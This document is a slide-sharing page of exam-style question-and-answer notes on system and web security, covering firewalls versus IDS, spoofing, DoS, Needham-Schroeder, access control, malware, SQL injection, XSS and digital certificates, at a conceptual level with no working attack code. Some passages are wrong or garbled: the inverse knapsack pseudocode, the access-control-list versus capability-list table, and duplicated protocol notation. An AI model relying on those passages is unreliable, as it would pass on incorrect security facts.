System and web security
•Download as DOCX, PDF•
0 likes•609 views
Question and Answers notes of System and web security
Recommended
More Related Content
What's hot
What's hot (20)
Similar to System and web security
Similar to System and web security (20)
More from chirag patil
More from chirag patil (20)
Recently uploaded
Recently uploaded (20)
System and web security
- 1. Difference between firewall and IDS. 5M No. Firewall Intrusion Detection System 1 A firewall is a hardware and/or software which functions in a networked environment to block unauthorized access while permitting authorized communications. An Intrusion Detection System (IDS) is a software or hardware device installed on the network (NIDS) or host (HIDS) to detect and report intrusion attempts to the network. 2 A firewall can block connection. An Intrusion Detection System (IDS) cannot block connection. 3 Firewall performs actual actions such as blocking and filtering. Intrusion detection systems just detect connections and alert a system administrator. 4 Firewall restricts access to your network by deciding which packet should allow. Intrusion detection system are security cameras, it only detect packets. 5 Types of Firewall: Packet Filtering Firewall, Stateful- inspection Firewall, Network Address Translation (NAT) Firewall, Application Based Firewall, Hybrid firewalls. Types of IDS: Network IDS, Host IDS or HIDS, Protocol based IDS, Application protocol based IDS, Anomaly based IDS, Misuse Based, Hybrid based. What is IP spoofing? How does it lead to denial of service attack? 5M IP spoofing: 1. When a computer outside of your network pretends to be a trusted computer within the network, then, this action by the attacker is called IP Spoofing. 2. To gain access to your network, an outside computer must gain one of your trusted IP addresses from the network. So, the attacker might use an IP address within the range of your network. 3. On the other hand, the attacker can also use an authorized external IP address that is trusted within the network. 4. These IP addresses could be so trusted that they can also have special privileges to the important resources on the network. 5. IP Spoofing and Denial of Service are the two most famous attacks that an intruder launches to attack a particular target. 6. While IP Spoofing targets the routing table of the network, DOS attack aims at burning out the resources of the target computer.
- 2. 7. Different ways of IP spoofing: a. Injection of data or a set of commands into an existing stream of data that is passed in between a client and server application. b. Injection of data or commands into a peer-to-peer network connection. 8. The attacker also needs to change the routing table of the network. Changing the routing table of the network would enable the attacker to have bidirectional communication. For this purpose, the attacker points the entire routing table to the spoofed IP address. 9. Once the routing table is changed, the attacker starts receiving all the data from the network to the spoofed IP address. 10. He/she can even reply to those packets just like any other trusted user. Denial of service attack: 1. A denial-of-service attack (DoS attack) is a cyber-attack where the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. 2. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled. 3. A DoS attack is analogous to a group of people crowding the entry door or gate to a shop or business, and not letting legitimate parties enter into the shop or business, disrupting normal operations. 4. For an online shopping system identify vulnerability, threat and attack. 5M Vulnerability: 1. Vulnerability is a weakness that is inherent in every network and device. 2. This includes routers, switches, desktops, servers, and even security devices themselves. 3. Vulnerability is unintentional, which could exist in system design, business operations, installed software, and network configurations. 4. Vulnerabilities can be hardware, software or network vulnerabilities.
- 3. 5. Vulnerability is an internal problem. 6. Types of vulnerability: i. Software vulnerabilities: Software vulnerabilities are when applications have errors or bugs in them. Attackers look at buggy software as an opportunity to attack the systemmaking use of these flaws. Example: Buffer overflow, race conditions etc. ii. Firewall Vulnerabilities: Firewalls are software and hardware systems that protect intra- network from attacks. Firewall vulnerability is an error, weakness or invalid assumption made during the firewall design, implementation or configuration that can be exploited to attack the trusted network that the firewall is supposed to protect. iii. TCP/IP Vulnerabilities: These vulnerabilities are of the various layers of a network. These protocols may lack features that are desirable on the insecure network. Example: ARP attacks, Fragmentation attacks etc iv. Wireless Network Vulnerabilities: Wireless LANs have similar protocol-based attacks that plague wired LAN. Unsecured wireless access points can be a danger to organizations as they offer the attacker a route around the company’s network. Example: SSID issues, WEP issues etc. v. Operating System Vulnerabilities: The security of applications running on depends on the security of the operating system. Slightest negligence by the systemadministrator can make the operating systems vulnerable. vi. Web Server Vulnerabilities: These vulnerabilities are caused due to design and engineering errors or faulty implementation. Example: sniffing, spoofing etc. Threat: 1. In computer security a threat is a potential cause of an incident that may result in harm of systems and organization. 2. A threat can be either "intentional" (i.e. hacking: an individual cracker or a criminal organization) or "accidental" (e.g. the possibility of a computer malfunctioning) or otherwise a circumstance, capability, action, or event. 3. Threats classification: Threats can be classified according to their type and origin: 4. Types of threats: i. Interception: When an attacker gains unauthorized access to confidential information, it is known as interception. Example: Snooping, Traffic analysis
- 4. ii. Interruption: When important information of the systemis lost or unavailable to a user due to some reason it is known as interruption. Example: Denial of Service (DoS) iii. Modification: If an attacker gets access to a user’s information and can also tamper it then such a threat is known as a modification. iv. Fabrication: An attacker can create or fabricate counterfeit objects on a computing system. The attacker may insert extra transaction to a network communication systemor add records to existing database. Example: Man-in-the-middle attack, Replaying attack etc5. 5. Origins of threats: i. Deliberate: aiming at information asset- spying, illegal processing of data ii. Accidental: equipment failure, software failure iii. Environmental: natural event, loss of power supply iv. Negligence: Known but neglected factors, compromising the network safety and sustainability Attack: 1. In computer and computer networks an attack is any attempt to destroy, expose, alter, disable, steal or gain unauthorized access to or make unauthorized use of an asset. 2. Types of attack: Active attack and Passive attack 3. An "active attack" attempts to alter systemresources or affect their operation. 4. A "passive attack" attempts to learn or make use of information from the system but does not affect systemresources. 5. An "inside attack" is an attack initiated by an entity inside the security perimeter (an "insider"). 6. An "outside attack" is initiated from outside the perimeter, by an unauthorized or illegitimate user of the system (an "outsider"). Explain Needham Schroeder Authentication Protocol. 10M 1. The term Needham–Schroeder protocol can refer to one of the two key transport protocols intended for use over an insecure network, both proposed by Roger Needham and Michael Schroeder.
- 5. 2. The Needham–Schroeder Symmetric Key Protocol is based on a symmetric encryption algorithm. 3. It forms the basis for the Kerberos protocol. 4. This protocol aims to establish a session key between two parties on a network, typically to protect further communication. 5. The Needham–Schroeder Public-Key Protocol, based on public-key cryptography. 6. This protocol is intended to provide mutual authentication between two parties communicating on a network, but in its proposed form is insecure. 7. The symmetric Protocol Here, Alice (A) initiates the communication to Bob (B). S is a server trusted by both parties. In the communication: i. A and B are identities of Alice and Bob respectively ii. KAS is a symmetric key known only to A and S iii. KBS is a symmetric key known only to B and S iv. NA and NB are nonce’s generated by A and B respectively v. KAB is a symmetric, generated key, which will be the session key of the session between A and B The protocol can be specified as follows in security protocol notation: A → S : A , B , NA Alice sends a message to the server identifying herself and Bob, telling the server she wants to communicate with Bob. S → A : { NA,KAB,B,KAB,AKBS}KASNA,KAB,B,KAB,AKBS}KAS The server generates KABKAB and sends back to Alice a copy encrypted under KBSKBS for Alice to forward to Bob and also a copy for Alice. Since Alice may be requesting keys for several different people, the nonce assures Alice that the message is fresh and that the server is replying to that particular message and the inclusion of Bob's name tells Alice who she is to share this key with. A → B : {KAB,A}KBS{KAB,A}KBS
- 6. Alice forwards the key to Bob who can decrypt it with the key he shares with the server, thus authenticating the data. B−→A{NB}KABB→A{NB}KAB Bob sends Alice a nonce encrypted under KAB to show that he has the key. A → B : {NB–1}KABNB–1}KAB Alice performs a simple operation on the nonce, re-encrypts it and sends it back verifying that she is still alive and that she holds the key. 8. Attacks on the protocol The protocol is vulnerable to a replay attack (as identified by Denning and Sacco). If an attacker uses an older, compromised value for KAB, he can then replay the message {KAB,A}KBS{KAB,A}KBS to Bob, who will accept it, being unable to tell that the key is not fresh. 9. Fixing the attack This flaw is fixed in the Kerberos protocol by the inclusion of a timestamp. It can also be fixed with the use of nonces as described below. At the beginning of the protocol: A → B : A Alice sends to Bob a request. B → A : {A, N′BNB′} KBSKBS Bob responds with a nonce encrypted under his key with the Server. A → S : A,B,NA,{A,N′B}KBSA,B,NA,{A,NB′}KBS Alice sends a message to the server identifying herself and Bob, telling the server she wants to communicate with Bob. S → A : {NA,KAB,B,KAB,A,N′BKBS}KASNA,KAB,B,KAB,A,NB′KBS}KAS Note the inclusion of the nonce. The protocol then continues as described through the final three steps as described in the original protocol above. Note that N’B is a different nonce from NB. The inclusion of this new nonce prevents the replaying of a compromised version of {KAB,A}KBS since such a message would need to be of the form {KAB,A,N′B}KBS{KAB,A,NB′}KBS which the attacker can't forge since she does not have KBSKBS. 10. The Public-Key protocol This assumes the use of a public-key encryption algorithm.
- 7. Here, Alice (A) and Bob (B) use a trusted server (S) to distribute public keys on request. These keys are: i. KPA and KSAKPA and KSA, respectively public and private halves of an encryption key- pair belonging to A (S stands for "secret key" here) ii. KPB and KSBKPB and KSB, similar belonging to B iii. KPSKPS and KSSKSS, similar belonging to S. (Note this has the property that KSSKSS is used to encrypt and KPSKPS to decrypt). Difference between access control list and capability list. 5M No. Access control list Capability list 1 An access control list is a table that tells a computer operating system which access rights each user has to a particular system object, such as a file directory or individual file. A capability list is a token, ticket, or key that gives the possessor permission to access an entity or object in a computer system. 2 Access control list can attemptto name any objectinthe systemas the target of an operation. In capability list a usercan onlyname those objectsforwhicha capabilityisheld. 3 Access control list is based on users. Capability list is based on process. 4 Access control list consists of tokens, tickets and keys that give permission to give access. Capability list consists addresses or names of the devices to which permission should give. 5 Access control list allows deleting a user from list. Capability list does not allows to delete user. Consider an online voting System. People will cast their votes through the internet. For this system identify vulnerability, threat and attack. 5M Vulnerability: Common vulnerability in online voting system are: 1. Denial-of-service attack against the voting process. If a client sends an HTTP request containing unexpected header fields, the server logs the field names to disk. By sending many specially crafted requests containing fields with very long names, an attacker can exhaust the server’s log storage, after which it will fail to accept any new votes. Curiously, the vulnerable code is only a few lines from the comment, “Don’t write to disk; we don’t know how large the value is.” This indicates that the developers were aware of similar attacks but failed to account for all variants. 2. A second problem we discovered is a shell-injection vulnerability in a server-side user interface that is intended to allow operators to perform pre-determined administrative tasks. The vulnerability would allow such an operator to execute arbitrary shell commands on the
- 8. election servers with root privileges. Under current procedures, this is moot, since the same workers perform other administrative tasks at the command line as root. 3. Reliability of a software or hardware device. There is still a problem in software and device, meaning if used several times sometimes still an error (error) in the calculation of the number of votes. Neither in terms of hardware, such as equipment/devices are sometimes not able to respond quickly. 4. Human factors problems such as election officials, election officials sometimes do not understand its right to operate the device technology used in elections. And next is the factor that the voters itself has not been teach, voters doesn’t know of their own constituencies or have never done the selection by using e-voting technology that goes wrong in the run, resulting in many failures in performing the intended candidate selection. Threats: Internet voting systems pose numerous security threats. 1. Denial of service: Denial of service is common threat. It occurs during internet election. 2. Trojan horse spyware to change or monitor votes: In this threat there is possibility of vote theft and loss of privacy. 3. Automated vote buying: 4. Insider attack on voting system: Insider attacks are common in commercial settings. 5. Virus specific to Internet voting system: There is vote theft, privacy loss, disenfranchisement, compromise of election. 6. Spoofing: Spoofing is easy and common threat. It can be launched from anywhere. Attacks: 1.Denial of Service (DoS) attacks that are carried out have devastating consequences and in most cases the extremely affect the ability to provide availability to a system. The following two methods described are how a hacker may compromise the availability to a voting system. A. Ping of Death The ping of death relies on a flaw in some Transmission Control Protocol, Internet Protocol (TCP/IP) stack implementations. The attack relates to the handling of unusually and illegally large ping packets. Remote systems receiving such packets can crash as the memory allocated for storing packets overflows. The attack does not affect all systems in the same way, some systems will crash, and others will remain unaffected.
- 9. B. Packet Flooding Packet flooding exploits the fact that establishing a connection with the TCP protocol involves a three phase handshake between the systems. In a packet flooding attack, an attacking host sends many packets and does not respond with an acknowledgment to the receiving host. As the receiving host is waiting for more and more acknowledgments, the buffer queue will fill up. Ultimately, the receiving machine can no longer accept legitimate connections 2. A computer virus is a computer program that can reproduce itself and may cause undesired effects in computers where it is active. To do its malicious work, the virus needs executing. Usually viruses are located together with other code that is likely, will be executed by a user. As long as the virus is active on the computer, it can copy itself to other files or disks when they are used. Viruses made could destroy E-voting systems. This could compromise the availability at election time forcing governments and institutions to perform re-elections. 3. A worm is a type of virus that does not change any existing program or file to spread itself. Instead, it makes copies of itself within an infected computer and spreads to become active on other systems. It is intentionally destructive, overwriting portions of the files with random data. This damage is non-repairable, so files may need reinstallation or restoring from a backup. Worms could overwrite files and change results of votes if programmed to do so, bringing the integrity of the votes into question. 4. Trojan horses are pieces of computer code that download to a computer while connected to the internet. They may be harmless, but it could possibly delete or modify an important file from the computer, plant a harmful virus, or even steal user's passwords. This makes all sorts of fraudulent schemes possible. Once inside a computer the Trojan horse can access passwords, screen names and other personal information and then distribute this confidential data to the attacker. Trojan horse represents an immense threat to systems confidentially and integrity of information of E-voting systems. 5. Numerous physical attacks can be carried out on E-voting system to sabotage an election. Vandalismof E-voting systems would make them inoperable for the day of the election. Saboteur's could remove network connections and pull plugs out of E-voting systems causing votes to be lost. Attackers may remove hard drives or smart cards replacing them with falsified data. E-voting machines could be stolen with attackers discovering sensitive voting information about users. Distinguish between attack and vulnerability. 5M No. Attack Vulnerability 1 An attack is an act or event that harms a computer system. Vulnerability is some flaw or weakness is computer system. 2 Attack is intentional way to destroy a Vulnerability is unintentional, which could exist
- 10. system. in systemdesign, business operations, installed software, and network configurations. 3 Attack can be active attack or passive attack. Vulnerabilities can be hardware, software or network vulnerability. 4 Attack is done from out or inside the network. Vulnerability is an internal problem. 5 Examples: Cross-site scripting, SQL injection, Viruses etc. Examples: Buffer overflow, Race conditions etc. Difference between symmetric and asymmetric cryptography. 5M No. Symmetric cryptography Asymmetric cryptography 1 Symmetric encryption requires a single key known only to the authorized parties. Asymmetric encryption uses a pair of keys, public key and private key. 2 Symmetric encryption uses the same key to both encryption and decryption. Asymmetric encryption uses one key for encryption and another key for decryption. 3 The most commonly used symmetric encryption algorithms include DES, 3DES, AES and RC4. The most common asymmetric encryption algorithm is RSA. 4 Symmetric key algorithms are faster as compare to asymmetric key algorithms. Asymmetric key algorithms are slower as compare to symmetric key algorithms. 5 The symmetric encryption is used for bulk data transmission. The asymmetric encryption is used for securely exchanging secret keys. Knapsack cryptosystem. 5M 1. Knapsack is an asymmetric-key cryptosystem. 2. It requires two keys for communication public key and private key. 3. Public key is used for encryption and private key is used for decryption. 4. Knapsack problem is also called as rucksack problem. 5. Knapsack is a problem in combinatorial optimization. 6. Knapsack problem states that, Given a set of items, each with a mass and a value, determine the number of each item to include in a collection so that the total weight is less than or equal to a given limit and the total value is as large as possible. 7. There are two versions of knapsack: A. 0/1 Knapsack Problem: Items are indivisible in this knapsack problem. You can either take an item or not. In this problem some special instances can be solved with dynamic programming.
- 11. B. Fractional knapsack problem: Items are divisible in this knapsack problem. You can take any fraction of an item. 8. Algorithm for knapsack: KnapsackSum(S[n],X[n]) { T←0 For (i=1 to n) { T←T+Si*X; } return T } 9. Inverse algorithm for knapsack: Inverse_KnapsackSum(T,S[n]) { For (i=n to 1) { If T≥S; { Xi←1 T←T+S } Else Xi←0 } Return X[1,……,n] } 10. Knapsack cryptosystem includes following process: A. Generation of key B. Encryption process C. Decryption process 11. Generation of key: Generation of encryption and decryption key i.e. public key and private key.
- 12. 12. Encryption process: Encryption of message using knapsack algorithm. It converts plaintext into ciphertext. 13. Decryption process: Decryption of message using inverse knapsack algorithm. It converts ciphertext into plaintext. What are the different modes of authenticating a user? Different modes of authenticating user: 1. Computer recognition software: i. This authentication factor is accomplished by installing a small authentication software plug- in that places a cryptographic device marker onto the consumer’s computer. ii. It can then be verified as a second factor during the authentication process. iii. The authentication process would then include two factors: password and the device marker on the consumer’s computer. iv. Because the device marker is always on the consumer's computer, the user only has to enter their username and password to log in. 2. Biometrics: i. Biometrics authentication is verification of physical characteristics such as a fingerprint or eye recognition using a hardware device. ii. Offering biometric authentication for consumer online banking has significant challenges including distribution of biometric readers and the associated cost per user. iii. Fingerprint scan is an example of biometric authentication. iv. Face recognition is also biometric authentication technique. 3. E-mail or SMS one-time password (OTP): i. E-mail or SMS OTP is based on sending a second one-time use password to a registered e-mail address or cell phone. Ii. The user must then input that second one-time password in addition to their normal password to authenticate to the online bank. iii. This method is generally used for everyday logins.
- 13. iv. Because there is a time lag before users get the OTP they need to login but is often used for the initial enrollment before providing another form of authentication. 4. One Time Password (OTP) token: i. OTP token providing users with a hardware device that generates a constantly-changing second password that must be entered into the online banking Web site in addition to the normal password. ii. OTP tokens require the user to carry the token with them to login to the bank Web site. iii. If a customer has multiple banks that require OTP tokens, then the user must carry multiple tokens unless the banks integrate their systems to accept a single token. iv. OTP tokens are mostly used in bank transactions. 5. Out of band: i. Out-of-band verification involves the bank calling a registered phone number and requesting that the user enter their password over the phone prior to allowing the user to login. ii. This is similar to e-mail or SMS OTPs. iii. This requirement introduces a time lag and requires that the user be at the location of the registered phone number. 6. Peripheral device recognition: i. Peripheral device recognition is accomplished by placing a cryptographic device marker on a user’s existing device such as a USB flash drive, Smart Phone memory card, etc. ii. This can be good alternative to the OTP token. iii. Because it provides a hardware based second factor but doesn’t require the user to carry an additional device. iv. In addition, device markers from multiple banks can reside on a single hardware device without requiring the various banks to integrate their systems. 7. Scratch-off card: i. Scratch-off card contains several PIN numbers that the user scratches off and then used only one time to log in. ii. This is a lower-cost, one-time password option than tokens.
- 14. Difference between discretionary access control and mandatory access control: 5M No. Discretionary access control Mandatory access control 1 In discretionary access control (DAC), the owner of the object specifies which subjects can access the object. In mandatory access control (MAC), the system specifies which subjects can access specific data objects. 2 Discretionary access control is based on the desretion of the owner. Mandatory access control is based on security label. 3 Operating systems such as Windows, Linux, and Macintosh are based on discretionary access control. Mandatory access control is used in military institution. 4 As compare to mandatory access control discretionary access control is not easier way for establishing and maintaining access. Mandatory access control is easier way for establishing and maintaining access as compare to discretionary access control. 5 Discretionary access control is more flexible than mandatory access control. Mandatory access control is less flexible than discretionary access control. 6 Discretionary access control is more labor intensive than mandatory access control. Mandatory access control is less labor intensive than discretionary access control. 7 Access can be provided by users. Access can only be change and provide by admin in mandatory access control. Software Reverse engineering 5M 1. Software Reverse Engineering (SRE) is the practice of analyzing a software system or a part of the software system. 2. Reverse engineering skills are also used to detect and neutralize viruses, malware and to protect intellectual property. 3. The process of taking a software program’s binary code and recreating it to trace it back to the original source code is called as software reverse engineering. 4. Software reverse engineering involves reversing a program's machine code back into the source code that it was written in, using program language statements. 5. Software reverse engineering is widely used in computer hardware and software to enhance product features and to fix certain bugs. 6. Reverse engineering is also known as, the process of converting the code written in high level language into a low level language without changing the original program. 7. It is similar to disassembling the parts of a vehicle to understand the basic functioning of the machine and internal parts and making appropriate adjustments for a better performance.
- 15. 8. Reverse engineering is taking apart an object to see how it works in order to duplicate or enhance the object. 9. Reverse engineering can be applied to several parts of the software or hardware development activities to convey different meanings. 10. There are two types of reverse engineering, in the first type, the source code is available, but high-level aspects of the program are not available. The effort is to discover the source code for the software that is being developed is known as reverse engineering. 11. In the second case, the source code for the software is not available, the process of discovering the possible source code is known as reverse engineering. 12. To avoid copyright, reverse engineering uses clean room design technique. 13. The main purpose of reverse engineering: i. Audit the security ii. Remove the copy protection iii. Customize the embedded systems iv. Include additional features 14. Reverse engineering is used in many fields such as software design, software testing and software programming etc. 15. In software design, reverse engineering enables the developer or programmer to add new features to the existing software with or without knowing the source code. There are different techniques are used to add new features to the software. 16. Reverse engineering helps the testers to study and analyze the virus code and other malware code. 17. The main purpose of reverse engineering is to make the system robust so as to protect it from spywares and hackers. 18. The process of reverse engineering uses some tools to analyze software and determine its component. 19. Tools used in software reverse engineering:
- 16. i. Disassemblers: A disassembler is used to convert binary code into assembly code and to extract strings, functions, libraries etc. The disassembler convert the machine language into a user-friendly format. ii. Debuggers: This tool expands the functionality of a disassembler by supporting the CPU registers, the hex duping of the program, view of stack etc. Using debuggers, the programmers can set breakpoints and edit the assembly code at run time. Debuggers analyze the binary in a similar way as the disassembler and allow the reverser to step through the code by running one line at a time to investigate the results. iii. Hex Editors: These editors allow the binary to be viewed in the editor and change it as per the requirements of the software. There are different types of hex editors available that are used for different functions. iv. PE and Resource Viewer: The binary code is designed to run on a windows based machine and has a very specific data which tells how to set up and initialize a program. All the programs that run on windows should have a portable executable that supports the DLLs the program needs to borrow from. 20. Reverse engineering has developed to take positive approach for creating descriptive data set of the original object. 21. There are many applications used for reverse engineering. 22. Due to the development of multiple devices, reverse engineering software enables programmers to manipulate the data into a useful form. 23. Reverse engineering is also beneficial for business and owners to incorporate advanced features into their software to meet the demands of the growing markets. What are the different phases of a virus? Explain 5M Different phases of virus: i. Dormant phase ii. Propagation phase iii. Triggering phase iv. Execution phase i. Dormant Phase:
- 17. 1. The virus remains idle. 2.It gets activated based on a certain action or event. 3. Example of dormant phase is, a user pressing a key or on a certain date and time etc. ii. Propagation Phase: 1. The virus starts propagating, that is multiplying itself. 2. A piece of code copies itself and each copy starts copying more copies of self, thus propagating. 3. Virus starts placing its copies into other applications. iii. Triggering Phase: 1. A Dormant virus moves into this phase when it gets activated, that is, the event it was waiting for gets initialized. 2. The virus is activated to perform the function for which it was intended. 3. It is caused by a variety of system events. iv. Execution Phase: 1. This is the actual work of the virus. 2. In this phase virus function is performed. 3. Virus can be destructive or harmless. Define with examples i) SQL injections ii) Cross-site scripting. 5M i. SQL injection: 1. SQL injection is malfunction program used to hack databases. 2. SQL injection is a technique used for code injection which exploits security in the database application programs. 3. Such SQL vulnerabilities are occurred when user input are not strongly checked. 4. SQL injection is one of the most common application layer attack technique used for extracting valuable data from the databases.
- 18. 5. SQL injection attacks: i. Incorrectly filtered escape characters ii. Incorrect type handling iii. Vulnerabilities in database server iv. Blind SQL injection v. Conditional responses vi. Conditional errors vii. Time delays 6. Incorrectly filtered escape characters: It occurs when user input is not properly filtered. 7. Incorrect type handling: It occurs when a data field is not strongly typed checked for constraint. 8. Vulnerabilities in database server: It occurs due to problem in server software. 9. Blind SQL injection: This attack is used when a web application is vulnerable to an SQL injection but not visiblr to the attacker. 10 Conditional responses: This SQL injection evaluates a logical statement on an ordinary application screen. 11. Conditional errors: This type of blind SQL injection attack causes some error. 12. Time delays: Time delay is type of blind SQL injection. It causes to query to take infinite time to execute a query. ii. Cross site scripting:
- 19. 1. Cross site scripting attacks are type of injection in which malicious scripts are injected into trusted website. 2. Cross site scripting attacks occurs when an attacker uses a web application to send malicious code. 3. Cross site scripting refers to client side code injection attack. 4. An attacker can use cross site script (XSS) to send a malicious script to an unsuspecting user. 5. This malicious script can access any cookies, session tokens, or other sensitive information from the browser and site. 6. Cross site scripts can rewrite the content of the HTML document/page. Windows security 5M 1. Windows security and maintenance is a monitoring component of the windows NT family of operating system. 2. Action center and windows security center monitors the security and maintenance status of the computer. 3. It includes optimal operation of personal firewalls, anti-virus software and anti-spyware software. 4. Security and maintenance also includes working status of network access protection, windows update, user account control, windows error reporting and backup and restore. 6. It notifies the user of any problem with their criteria. 7. Security and maintenance consists of three major components: i. Control panel applet ii. Windows service iii. Application programming interface (API) 8. The control panel applet divides the monitored criteria into categories and color-codes them. Yellow indicates non-critical warning and red indicates critical warning. 9. Security center determines the current state of the settings.
- 20. 10. This service continually monitors the system for changes and it notifies the user if it detects a problem. 11. To show notifications, it adds a notification icon into the windows taskbar. 12. Set of API let programs to retrieve and to receive notification of the aggregate health status within security and maintenance. 13. These APIs allow programs to confirm that systemis in healthy state or not. 14. Security log is a log that contains records of login/logout activity. 15. Security log is tool to troubleshoot problems and to detect and investigate attempted and successful unauthorized activity. What are the different types of malware? How do they propagate? 10M Types of malware: 1. Virus: i. A virus is a malicious code that has the capability to copy itself. ii. Viruses spread when the software or document they are attached to is transferred from one computer to another using any device or network. iii. Computer virus can corrupt or destroy your system. iv. Viruses are generally destructive. 2. Worm: i. A worm is a part of malicious code that can spread from one computer to another. ii. Worms are specifically designed to exploit vulnerabilities, and they spread by using network and Internet connections. iii. The big danger that a worm poses is its capability to replicate itself on a system. iv. Worm is also called as sub-class of viruses. 3. Trojan horse or Trojan: i. Trojan is malicious code that can cause to damage system. ii. Some Trojans are more annoying than harmful.
- 21. iii. Some Trojan cause serious damage by deleting files and information stored on the system. iv. Downloading pirated software may actually contain Trojan. 4. Blended threat: i. Blended threat is more sophisticated attack. ii. It bundles some worst aspects of viruses, worms, Trojan horses and malicious code into a single threat. iii. Blended threat uses server and internet vulnerabilities to transmit and spread attacks. iv. They cause harm to the infected system on network and propagate using multiple methods. 5. Spyware: i. A spyware is a type of malware that spies on you without your knowledge. ii. It collects a variety of different types of data from your system. iii. Different types of malware can act as spyware. iv. There are some spyware that spy on keystrokes to steal financial data. 6. Adware: i. Adware is a type of malware that comes along with spyware. ii. Adware is any type of software that displays advertising on computer. iii. Adware’s are considered to be more acceptable than other types of Malware. iv. An example of an adware is the Ask Toolbar that’s included with Oracle’s Java software. 7. Key logger: i. A key logger runs in the background to record every keystroke made by user. ii. Keystrokes can include usernames, passwords, credit card numbers, and other sensitive data. iii. Key loggers upload these keystrokes to a malicious server where it can be analyzed and people can pick out useful passwords and credit card numbers. iv. Different types of malware can act as key loggers. Employers can also install key loggers into their employees’ computers for monitoring purposes.
- 22. 8. Botnet or Bot: i. A botnet is a software program created to automatically perform specific operations. ii. Bots are acts like robots that are snippets of code designed to automate tasks and respond to instruction. iii. A malicious bot is installed in a systemwithout the user permission. iv. Websites can guard against bots with CAPTCHA tests that verify users as human. According to many reports, botnet currently pose the biggest threat to the Internet. 9. Rootkit: i. A Rootkit is a set of software tools that hides it presence in the lower layers of the operating system. ii. A rootkit is a type of malware designed to burrow deep into your computer to avoid detection by security programs and users. iii. Rootkits continually hide their presence. iv. Users can protect themselves from rootkits by regularly patching vulnerabilities in software, applications, operating systems, updating virus definitions, avoiding suspicious downloads and performing static analysis scans. 10. Ransomware: i. Ransomware is a type of malware that takes a computer or its data hostage in an effort to extort money from victims. ii. There are two types of Ransomware: Lockscreen Ransomware and Encryption Ransomware. iii. Lockscreen Ransomware displays a full-screen image or webpage that prevents you from accessing anything from your computer. iv. Encryption Ransomware encrypts your files with a password, preventing you from opening them. Give two techniques to establish a covert channel. 5M Techniques to establish a covert channel: i. Unused Header Bits
- 23. ii. Optional Header Fields iii. Semantic Overloading of Header Fields iv. Packet and Message Sequence Timing v. Payload Tunneling i. Unused Header Bits: 1. Exploiting protocols such as TCP/IP it is possible to encode a covert channel using reserved or unused bits of their headers. 2. If there is no confirmation on the receiver or the protocol specifications do not impose explicit values then hidden data can be transmitted. 3. The unused fields in TCP/IP can be used to establish malicious communication channel. 4. These malicious software agents use the unused fields of ICMP and TCP/IP packets to establish malicious communication channels. ii. Semantic Overloading of Header Fields: 1. Semantic overload occurs when a word or phrase has more than one meaning. 2. Semantic overload is related to the linguistic concept of polysemy. 3. Overloading is related to the psychological concept of information overload, and the computer science concept of an overloaded expression. 4. A term that is semantically overloaded is a kind of "overloaded expression" in language that causes a certain small degree of "information overload" in the receiving audience. What is IDS? How does it differ from a honeypot? Discuss the different types of IDS. 10M IDS: 1. IDS stand for Intrusion Detection System. 2. An Intrusion Detection System (IDS) is a software or hardware device installed on the network (NIDS) or host (HIDS) to detect and report intrusion attempts to the network. 3. An IDS gathers information within a LAN of unauthorized access or misuse. 4. An IDS is also referred to as a packet sniffer.
- 24. 5. An IDS evaluates a suspected intrusion once it has took place and signals an alarm. IDS is differ from honeypot: 1. An IDS is Intrusion Detection System which gathers information about unauthorized access, whereas Honeypot is a term derived from old fashioned methods of disposing of unwanted flying insects. 2. The IDS is designed to protect and monitor a live production environment, whereas the honeypot is intended to draw them. 3. An IDS is a defense, whereas a honeypot is not a defense. 4. An IDS will never get you charged with "entrapment", whereas a honeypot might get you charged with “entrapment”. 5. An IDS is a tool for monitoring and reporting systems activities which are unauthorized, whereas a Honeypot is a decoy system attract attacks for the purpose of analysis. Types of IDS: Network IDS, Host IDS or HIDS, Protocol based IDS, Application protocol based IDS, Anomaly based IDS, Misuse Based, Hybrid based. Network based IDS and Host based IDS are two general types of IDS. i. Network Based IDS: 1. Network based IDS is the first type of IDS. 2. This type of IDS is deployed at strategic places in the network infrastructure. 3. It is used to capture traffic going across the wire and comparing it to a database of known attack signatures. 4. If the packets are inspected and there is a match to the signature database then actions can be taken such as alerts to the administrator, sending a RST to the attacking host to kill the connection or dynamically modifying firewall rules to block the connection. 5. Network IDS are most similarly to a sniffer on steroids. 6. Types of Network IDS: Snort Network IDS, Cisco Network IDS. ii. Host Based IDS:
- 25. 1. Host based IDS is the second type of IDS. 2. Host IDS is run as a service or agent on the protected host. 3. Host IDS does not insect traffic that is not directed at the host it is protecting. Explain the process of generation & verification of digital certificate. 10M 1. A digital certificate is a digital form of identification. 2. A digital certificate is a digital credential that provides information about the identity of an entity and other information. 3. A digital certificate is issued by an authority called as a certification authority (CA). 4. A digital certificate is valid for only a specific period of time. 6. The user knows it is valid because a trusted certification authority has issued the certificate. 7. Digital certificates provide support for public key cryptography because digital certificates contain the public key of the entity identified in the certificate. 8. Digital certificates are based on public key cryptography for authentication. 9. At the time of issue of digital certificate, the issuing certification authority signs the certificate with its own private key. 10. The structure of digital certificate is reliable to retrieve and understand information within the certificate. 11. Digital certificate contains: a. Version number b. Serial number c. Certificate algorithm identifier d. Issuer name e. Validity period f. Subject name g. Subject public key information
- 26. h. Issuer unique identifier i. Subject unique identifier j. Extensions k. Certification authority's digital signature 12. Digital signature technology allows the recipient of given signed message to verify its real origin and its integrity. 13. The process of digital signature verification is purposed to as certain if a given message has been signed by the private key that corresponds to a given public key. 14. The digital signature verification includes the following steps: a. Message digest decryption b. Digest evaluation c. Digest comparison 15. Message digest decryption: The digest has been encrypted using the issuer’s (Alice) private key. The digest is now decrypted using the issuer’s public-key included in the message. 16. Digest evaluation: The message cannot be derived from the digest itself, the recipient must re-evaluate the digest using the exact same hashing algorithm the issuer used. 17. Digests comparison: The digest decrypted and the digest evaluated are compared. If there is a match, the signature has been verified, and the recipient can accept the message as coming unaltered from the issuer. 18. If the digital signature is not real and it is decrypted with the public key then the obtained original value will not be the original hash-value of the original message. 19. If the message was changed after its signing, the current hash-value calculated from this changed message will differ from the original hash-value because the two different messages correspond to different hash-values. 20. If the public key does not correspond to the private key used for signing, the original hash- value obtained by decrypting the signature with an incorrect key will not be the correct one. ARP spoofing: 1. ARP stands for address resolution protocol.
